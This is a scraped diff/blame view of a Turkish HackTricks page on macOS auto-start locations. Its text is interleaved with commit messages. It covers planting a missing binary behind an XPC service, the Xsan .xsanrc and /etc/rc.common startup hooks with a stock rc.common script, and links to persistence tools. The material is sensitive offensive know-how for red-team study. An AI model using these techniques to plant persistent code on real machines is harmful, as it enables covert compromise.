											
										
										
											2024-03-17 16:37:08 +00:00
+								Görünüşe göre `/System/Library/LaunchAgents/com.apple.amstoold.plist`'den gelen `plist` bu ikiliyi kullanıyordu ve bir XPC servisini açığa çıkarıyordu... sorun şu ki ikili mevcut değildi, bu yüzden bir şey yerleştirebilir ve XPC servisi çağrıldığında ikiliniz çağrılacaktı.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Artık macOS'ta bunu bulamıyorum.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								### ~~xsanctl~~
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* **`/Library/Preferences/Xsan/.xsanrc`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Root gereklidir
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Tetikleyici**: Servis çalıştırıldığında (nadiren)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve sömürü
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bu betiği çalıştırmak pek yaygın değil gibi görünüyor ve macOS'ta bile bulamadım, bu yüzden daha fazla bilgi istiyorsanız yazıya bakın.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								### ~~/etc/rc.common~~
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								{% hint style="danger" %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								**Bu modern MacOS sürümlerinde çalışmıyor**
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								{% endhint %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Ayrıca buraya **başlangıçta çalıştırılacak komutlar** yerleştirmek mümkündür. Tipik bir rc.common betiği örneği:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
 								#
 								# Common setup for startup scripts.
 								#
 								# Copyright 1998-2002 Apple Computer, Inc.
 								#
 								######################
 								# Configure the shell #
 								######################
 								#
 								# Be strict
 								#
 								#set -e
 								set -u
 								#
 								# Set command search path
 								#
 								PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
 								#
 								# Set the terminal mode
 								#
 								#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
 								#    TERM=$(tset - -Q); export TERM
 								#fi
 								###################
 								# Useful functions #
 								###################
 								#
 								# Determine if the network is up by looking for any non-loopback
 								# internet network interfaces.
 								#
 								CheckForNetwork()
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								local test
 								if [ -z "${NETWORKUP:=}" ]; then
 								test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
 								if [ "${test}" -gt 0 ]; then
 								NETWORKUP="-YES-"
 								else
 								NETWORKUP="-NO-"
 								fi
 								fi
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								alias ConsoleMessage=echo
 								#
 								# Process management
 								#
 								GetPID ()
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								local program="$1"
 								local pidfile="${PIDFILE:=/var/run/${program}.pid}"
 								local     pid=""
 								if [ -f "${pidfile}" ]; then
 								pid=$(head -1 "${pidfile}")
 								if ! kill -0 "${pid}" 2> /dev/null; then
 								echo "Bad pid file $pidfile; deleting."
 								pid=""
 								rm -f "${pidfile}"
 								fi
 								fi
 								if [ -n "${pid}" ]; then
 								echo "${pid}"
 								return 0
 								else
 								return 1
 								fi
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								#
 								# Generic action handler
 								#
 								RunService ()
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								case $1 in
 								start  ) StartService   ;;
 								stop   ) StopService    ;;
 								restart) RestartService ;;
 								*      ) echo "$0: unknown argument: $1";;
 								esac
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								}
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Kalıcılık teknikleri ve araçları
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
 								* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
 								<details>
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								HackTricks'ı desteklemenin diğer yolları:
-												arte

											
										
										
											2023-12-30 20:49:49 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
 								</details>